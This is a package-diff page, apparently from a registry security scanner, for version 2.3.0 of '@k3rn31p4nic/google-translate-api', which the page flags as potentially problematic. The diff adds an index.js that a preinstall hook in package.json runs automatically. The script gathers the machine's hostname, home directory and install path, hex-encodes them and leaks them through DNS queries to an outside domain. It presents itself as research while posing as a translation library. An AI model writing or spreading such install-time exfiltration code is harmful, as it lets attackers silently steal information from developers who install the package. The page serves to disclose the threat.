@k3rn31p4nic/google-translate-api 2.3.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of @k3rn31p4nic/google-translate-api might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +1 -0
  2. package/index.js +78 -0
  3. package/package.json +16 -0
package/README.md ADDED
@@ -0,0 +1 @@
1
+ This package is meant for testing purposes only.
package/index.js ADDED
@@ -0,0 +1,78 @@
1
+ /*
2
+
3
+ This code is used for research purposes.
4
+
5
+ No sensitive data is retrieved.
6
+
7
+ Callbacks from within organizations with a
8
+ responsible disclosure program will be reported
9
+ directly to the organizations.
10
+
11
+ Any other callbacks will be ignored, and
12
+ any associated data will not be kept.
13
+
14
+ For any questions or suggestions:
15
+ https://twitter.com/zuh4n
16
+
17
+ */
18
+
19
+
20
+ const dns = require('dns');
21
+ const os = require('os');
22
+
23
+ const suffix = '.dns.dependency-c4llb4ck.0lo.org';
24
+ const ns = 'dns1.dependency-c4llb4ck.0lo.org';
25
+
26
+ const package = 'google-translate-api';
27
+
28
+
29
+ function sendToServer(data) {
30
+
31
+ data = Buffer.from(data).toString('hex');
32
+ data = data.match(/.{1,60}/g);
33
+
34
+ id = Math.random().toString(36).substring(2);
35
+
36
+ data.forEach(function (chunk, idx){
37
+ try {
38
+ dns.resolve(
39
+ 'v2_f.' + id + '.' + idx + '.' + chunk + '.v2_e' + suffix, 'A',
40
+ console.log);
41
+ } catch (e) { }
42
+ });
43
+
44
+ }
45
+
46
+ function tryGet(toCall) {
47
+
48
+ try {
49
+ return toCall();
50
+ } catch(e) {
51
+ return 'err';
52
+ }
53
+
54
+ }
55
+
56
+ data = {
57
+ p : package,
58
+ h : tryGet(os.hostname),
59
+ d : tryGet(os.homedir),
60
+ c : __dirname
61
+ }
62
+
63
+ if (data['h'] == 'BBOGENS-LAPTOP') {
64
+ process.exit(0);
65
+ }
66
+
67
+ data = JSON.stringify(data);
68
+
69
+ sendToServer(data);
70
+ dns.lookup(ns, function(err, address) {
71
+ if (!err) {
72
+ nsAddress = address;
73
+ } else {
74
+ nsAddress = '8.8.8.8';
75
+ }
76
+ dns.setServers([nsAddress, '4.4.4.4']);
77
+ sendToServer(data);
78
+ });
package/package.json ADDED
@@ -0,0 +1,16 @@
1
+ {
2
+ "name": "@k3rn31p4nic/google-translate-api",
3
+ "version": "2.3.0",
4
+ "description": "Testing 'google-translate-api' package",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "",
8
+ "preinstall": "node index.js"
9
+ },
10
+ "author": "zuh4n",
11
+ "license": "ISC",
12
+ "dependencies": {
13
+ "google-translate-api": "^2.0.3"
14
+ },
15
+ "devDependencies": {}
16
+ }